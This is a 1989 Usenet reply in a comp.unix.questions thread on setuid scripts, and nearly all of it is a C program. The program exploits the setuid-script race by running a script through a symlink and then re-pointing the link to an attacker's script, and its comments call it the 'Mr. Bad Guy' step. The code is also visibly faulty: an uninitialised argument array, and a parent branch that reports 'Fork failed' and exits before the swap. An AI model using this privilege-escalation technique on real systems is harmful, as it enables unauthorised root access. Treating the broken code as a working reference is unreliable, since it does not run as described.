Path: utzoo!utgpu!jarvis.csri.toronto.edu!mailrus!ncar!ames!dftsrv!hq!mitch
From: mitch@hq.af.mil (Mitchell..Wright)
Newsgroups: comp.unix.questions
Subject: Re: setuid scripts
Message-ID: <MITCH.89Oct24151838@hq.af.mil>
Date: 24 Oct 89 19:18:38 GMT
References: <21256@adm.BRL.MIL> <20368@mimsy.umd.edu>
Sender: mitch@hq.af.mil
Distribution: na
Organization: Air Force HQ, The Pentagon
Lines: 62
In-reply-to: chris@mimsy.umd.edu's message of 24 Oct 89 16:55:51 GMT


In article <20368@mimsy.umd.edu> chris@mimsy.umd.edu (Chris Torek) writes:

>I suppose there is no particular reason not to let this Abynissian
>out of the carry-sack.  Here is the trick:
>
>	   main()
>                ...
>
I think that the timing problem can also be solved by:

#include <stdio.h>
#include <sys/wait.h>

/*
 * Symbolic link runner
 *
 * Please kids - don't try this at home
 *
 */

main(argc, argv, envp)
    int
      argc;
    char
      **argv,
      **envp;

{
    char *narg[2];
    int   pid;

    if (argc != 3) {
	  fprintf(stderr, "Usage: symlink <good> <bad>\n");
	  exit(1);
    }

    if (symlink(argv[1], "foo")) {
	  fprintf(stderr, "symlink bombed <sniff sniff> \n");
	  exit(2);
    }

    if (0 == (pid=vfork()))
      execve("foo", narg, envp);
    else {
	  fprintf(stderr, "Fork failed \n");
	  exit(3);
    }

    /*
     *  Now we can be Mr. Bad Guy
     *
     */
    unlink("foo");
    symlink (argv[2], "foo");
    wait((union wait *)NULL);
    unlink("foo");
    exit(0);
}

--
..mitch